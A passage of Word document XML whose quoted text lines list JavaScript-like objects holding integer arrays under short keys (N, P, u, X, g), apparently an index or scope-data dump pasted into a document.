    <w:p w14:paraId="659CC0E6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [2, 11, 12, 13, 14, 15],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A124F3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         u: [0, 1, 3, 4, 5, 6, 7, 8, 9, 10, 17]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46135F9C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7047BBA3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF63F80" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EEB88A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [106, 146, 189, 354]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182A51F7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A971D50" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [7, 2, 0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024C62D4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 14, 15, 16, 17],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47780D8C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [13, 27, 29, 71, 78, 88, 97, 101, 108, 110, 134, 136, 165, 215, 232, 235, 260, 289, 298, 319, 355]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AC85FB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9CE205" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1, 0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5997D2F9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30858FB9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE769F4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED85C87" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D628B4C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3886BDCC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [7, 18, 21, 22, 23, 24, 33, 35, 352]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242C1720" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7FDC33" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2, 0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262F657F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0355923B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D793CA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4D6241" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBF4874" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514B791C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [3, 7, 8, 13, 19, 159]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57720176" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAEE0FC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFA0A94" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297479E1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [11]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7474635C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3014AA39" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D31278" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73783D30" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [313]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D05219" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EA6611" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5A83FA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 3, 5, 7, 12, 14, 18, 20, 28, 29, 30, 31, 32, 33, 34],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A85D393" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [2, 4, 6, 8, 9, 10, 11, 13, 15, 16, 17, 19, 21, 22, 23, 24, 25, 26, 27, 125, 151, 159, 311, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B12B2B9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175F5B05" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40339360" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A9AB6F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [5, 7]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292287D5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC1CD4C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 10,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EDAB10" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [9],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C83F1C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2, 3, 5, 7, 9, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E29D4C9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 4, 6, 8, 63, 81, 90, 144, 180, 188, 249, 282, 283, 313, 344]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D50508" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582EA77F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DC97B2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B431FF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [6, 18, 20, 33]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EEF588" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4E197B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61344A90" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1D7013" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6142BF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404A7BEB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0480BABF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5988D2BB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71092340" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069A4DDB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A98AEB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         g: 17,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B435AB2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [12],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FB4C22" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 3, 4, 5, 6, 7, 8, 9, 10, 12, 13, 14, 15, 16],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A49CA7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [11, 46, 234, 305]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561A8683" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A7333E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7365C1B0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C479EC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09860551" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758698D7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A25496" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3993C84C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [16, 20, 21, 29, 284]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7577E239" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132EA403" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F56D1F1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C0F600" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [9, 159, 311, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AA23C2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2AA770" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6644FD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 5, 6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54715475" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [4, 7, 159, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC1EF56" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D078020" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CB02D9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3913A6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB3B8D2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC6313F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515C1960" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55464965" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047A9983" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5FE6B1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702205AA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64404437" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 3, 4, 5, 6]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1085DCC2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A72ABBB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C331A0D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [8, 10],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7B1499" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD23468" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [11, 38, 96, 145, 210, 221, 233, 234, 268, 305]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E315951" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663C429A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [3, 5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D40768" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 3, 4, 5, 6, 7],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512CE51D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [2, 12, 128, 143, 329, 352]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425E7C8D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDD0018" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62596E83" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF1709B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [2, 9]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1879BC0F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11304572" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E4F086" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 3, 6, 7, 8, 9, 10, 11],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EBEA73" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [2, 4, 5, 159, 176, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758DDFDE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED23A4A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2, 4, 5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42130AD0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F92B6E9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [15, 40]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7FF151" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4959A730" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6FB275" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 3, 4, 5, 6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1DFA0F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 2, 13, 14, 17, 18, 20, 21, 53, 159, 265, 297, 311, 317, 351]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580EFD32" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521448A5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F33C7D7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30868482" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33963D61" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BD7706" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708BF147" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B4114D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
